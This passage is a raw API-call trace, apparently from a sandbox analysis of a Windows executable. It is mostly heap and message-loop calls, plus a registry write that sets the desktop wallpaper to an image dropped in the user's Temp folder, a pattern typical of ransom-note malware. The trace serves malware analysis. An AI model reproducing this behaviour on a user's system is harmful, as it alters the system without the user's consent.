hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0287.668] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0287.668] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0287.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0287.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0287.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0287.668] timeGetTime () returned 0x118805a [0287.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.669] Sleep (dwMilliseconds=0xa) [0287.743] timeGetTime () returned 0x11880a4 [0287.743] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.743] Sleep (dwMilliseconds=0xa) [0287.818] timeGetTime () returned 0x11880ef [0287.818] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.818] Sleep (dwMilliseconds=0xa) [0287.890] timeGetTime () returned 0x1188137 [0287.890] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.890] Sleep (dwMilliseconds=0xa) [0287.962] timeGetTime () returned 0x118817f [0287.962] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.962] Sleep (dwMilliseconds=0xa) [0288.034] timeGetTime () returned 0x11881c7 [0288.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.034] Sleep (dwMilliseconds=0xa) [0288.079] timeGetTime () returned 0x11881f4 [0288.079] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.079] Sleep (dwMilliseconds=0xa) [0288.175] timeGetTime () returned 0x1188252 [0288.175] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0288.175] TranslateMessage (lpMsg=0x8cf798) returned 0 [0288.175] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0288.175] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0288.176] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0288.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.176] Sleep (dwMilliseconds=0xa) [0288.212] timeGetTime () returned 0x1188278 [0288.212] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.212] Sleep (dwMilliseconds=0xa) [0288.248] timeGetTime () returned 0x118829d [0288.248] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.248] Sleep (dwMilliseconds=0xa) [0288.286] timeGetTime () returned 0x11882c3 [0288.286] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.286] Sleep (dwMilliseconds=0xa) [0288.324] timeGetTime () returned 0x11882e9 [0288.324] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.324] Sleep (dwMilliseconds=0xa) [0288.570] timeGetTime () returned 0x11883df [0288.570] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.570] Sleep (dwMilliseconds=0xa) [0288.611] timeGetTime () returned 0x1188408 [0288.611] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.611] Sleep (dwMilliseconds=0xa) [0288.649] timeGetTime () returned 0x118842f [0288.649] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0288.650] Sleep (dwMilliseconds=0xa) [0288.686] timeGetTime () returned 0x1188453 [0288.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0288.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0288.686] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0288.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0288.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0288.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0288.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.686] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0288.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0288.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0288.687] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0288.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0288.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0288.688] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0288.688] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0288.688] RegCloseKey (hKey=0x2d0) returned 0x0 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0288.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0288.689] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0288.689] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0288.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0288.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0288.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0288.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0288.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0288.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0288.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0288.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0288.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0288.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0288.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0288.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0288.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0288.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0288.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0288.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0288.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0288.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0288.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0288.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0288.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0288.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0288.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0288.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0288.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0288.729] HeapFree (in: hHeap=0x970000, 